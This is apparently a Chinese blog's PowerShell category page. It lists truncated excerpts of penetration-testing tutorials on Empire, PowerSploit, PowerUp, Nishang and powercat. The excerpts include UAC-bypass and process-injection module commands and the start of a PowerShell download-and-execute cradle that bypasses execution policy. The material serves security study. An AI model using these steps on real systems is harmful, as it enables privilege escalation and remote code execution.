随笔分类 -  powershell

摘要:powershell攻击方法研究 执行摘要 在创建恶意软件时,攻击者越来越多地利用已存在于target上的工具来攻击计算机,因为Microsoft PowerShell默认安装在Windows计算机上,它是一个理想的攻击者工具链的候选项, 由于powershell使用较为灵活,并且检测更困难,因此被 阅读全文
posted @ 2020-11-29 23:14 micr067 阅读(1610) 评论(0) 推荐(1) 编辑
摘要:前言 目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。 powershell的功能强大且调用方式十分灵活,灵活使用powershell可以更加方便的管理windows。 1. cmd启动powershell 首先看看powers 阅读全文
posted @ 2020-06-21 15:06 micr067 阅读(2360) 评论(0) 推荐(1) 编辑
摘要:前言: 默认情况下,PowerShell配置为阻止Windows系统上执行PowerShell脚本。对于渗透测试人员,系统管理员和开发人员而言,这可能是一个障碍,但并非必须如此。 什么是PowerShell执行策略? PowerShell execution policy 是用来决定哪些类型的Pow 阅读全文
posted @ 2020-06-20 22:19 micr067 阅读(2572) 评论(1) 推荐(1) 编辑
摘要:powercat 也是一套基于 DNS 通信协议的工具。Powercat的dns的通信是基于dnscat设计的(其服务端就是dnscat)。在使用dnscat时需要进行下载和编译。 dnscat服务端安装: #git clone https://github.com/iagox86/dnscat2. 阅读全文
posted @ 2020-02-02 10:33 micr067 阅读(420) 评论(0) 推荐(0) 编辑
摘要:nishanhg 下载地址:https://github.com/samratashok/nishing 1.简介 nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.0 2.环境准备 阅读全文
posted @ 2019-10-26 23:12 micr067 阅读(940) 评论(0) 推荐(0) 编辑
摘要:会话注入 我们可以使用usemodule management/psinject模块来进程注入,获取权限 设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shell usemodule management/psinject set Li 阅读全文
posted @ 2019-10-25 23:46 micr067 阅读(508) 评论(0) 推荐(0) 编辑
摘要:权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) 当运行完提权模块后,back返 阅读全文
posted @ 2019-10-25 00:48 micr067 阅读(483) 评论(0) 推荐(0) 编辑
摘要:0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mi 阅读全文
posted @ 2019-10-24 00:50 micr067 阅读(956) 评论(0) 推荐(1) 编辑
摘要:PowerUp攻击模块实战 1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行 2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient) 阅读全文
posted @ 2019-10-22 23:45 micr067 阅读(517) 评论(0) 推荐(0) 编辑
摘要:PowerSploit PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit 安装 下载程序 阅读全文
posted @ 2019-10-22 00:12 micr067 阅读(400) 评论(0) 推荐(0) 编辑
摘要:Windows powershell是一种命令行外壳程序和脚本环境,它内置在win7以上版本的操作系统中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。powershell程序可以直接在内存中运行,可以作为命令提示符cmd.exe的扩充。 查看powershell版本信息 阅读全文
posted @ 2019-10-22 00:08 micr067 阅读(362) 评论(0) 推荐(0) 编辑